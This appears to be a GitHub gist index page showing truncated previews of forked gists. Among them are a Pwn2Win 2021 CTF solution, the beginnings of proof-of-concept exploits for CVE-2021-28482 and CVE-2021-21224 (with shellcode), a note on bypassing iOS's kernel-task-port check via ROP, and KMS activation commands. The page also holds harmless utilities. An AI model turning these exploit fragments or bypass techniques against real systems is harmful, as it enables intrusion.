boy1337 bb33bb
bb33bb / index.html
Created June 1, 2021 02:20 — forked from lbherrera/index.html
Solution for the MessageKeeper challenge from Pwn2Win 2021
<!DOCTYPE html>
<html>
<head>
<title>Pwn2Win | MessageKeeper</title>
</head>
<body>
<script>
let alphabet = "0123456789abcdef";
const sleep = (ms) => {
bb33bb / PoC_CVE-2021-28482.py
Created May 3, 2021 22:43 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
bb33bb / Service KMS
Created April 30, 2021 05:02 — forked from judero01col/Service KMS
Volume License Activation Key Service - KMS
## Find Available Target Editions
DISM.exe /Online /Get-TargetEditions
## Convert Server Standard 2019 Evaluation to Server Standard 2019
DISM /online /Set-Edition:ServerStandard /ProductKey:N69G4-B89J2-4G8F4-WWYCC-J464C /AcceptEula
## How To Activate
slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX
slmgr /skms [server]:[port]
slmgr /ato
bb33bb / gist:ec3a4771753fb71234d6285e8902f60b
Created April 26, 2021 13:34 — forked from wdormann/CVE-2021-21224.html
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
bb33bb / t2048.c
Created April 22, 2021 23:38 — forked from Siguza/t2048.c
2048 for your calculator! :D
/*
* t2048.c - 2048 for some TI calculators
*
* Copyright (c) 2014 Siguza
*
* Tested on TI-89 Titanium only. According to headers, it should work on TI-92 and Voyage 200 as well, but no promises.
* To be compiled with ti-gcc - as far as I remember, TI's own C compiler can't handle this.
*
* Licensed under MIT, i.e. feel free to use and redistribute at will, but I'd appreciate some credit. :)
*/
bb33bb / img3ex.c
Created April 22, 2021 23:38 — forked from Siguza/img3ex.c
Img3 extractor
/*
* img3ex.c - Extract Img3 files from any binary blob, e.g. a /dev/disk* dump.
*
* Placed in the Public Domain, do whatever you want with it. No warranty of any kind.
*
* Compile with: cc -o img3ex -std=c11 -Wall -O3 img3ex.c
*/
#include <errno.h> // errno
#include <fcntl.h> // open, O_RDONLY
Moved here: https://github.com/Siguza/ios-build/blob/master/libimobiledevice/build.sh

Keybase proof

I hereby claim:

  • I am Siguza on github.
  • I am siguza (https://keybase.io/siguza) on keybase.
  • I have a public key whose fingerprint is 6393 3A9D E301 7C59 ADE5 3EBB 1591 E8CA 0BCA 036F

To claim this, I am signing this object:

Sadly I don't have a dev device on iOS 10, but for anyone playing around with zIVA caring about the kernel task port:

Starting with iOS 10.3 (and macOS 10.12.4), Apple changed convert_port_to_locked_task (and a few other port-to-something conversion functions) to blacklist the kernel task by means of a direct check. As a result, you can still obtain the kernel task port, but almost all APIs will simply treat it like MACH_PORT_NULL, thus rendering it useless. The check is a simple pointer comparison though, so it can be circumvented by just remapping the task struct at an additional virtual address and creating a new port from that with a ROP equivalent of:

vm_map_remap(
    kernel_map,
    &remap_addr,
    sizeof(task_t),
    0,
    VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,

// Siguza
// Treat as public domain.
#include <ctype.h> // isspace
#include <stdlib.h> // malloc, free,
#include <string.h> // strlen, strncmp, strstr
// Turn delimiter tokens into null terminators and
// create array of pointers to each new string.
static void destructive_split(char *str, const char *delim, char ***out, size_t *outlen)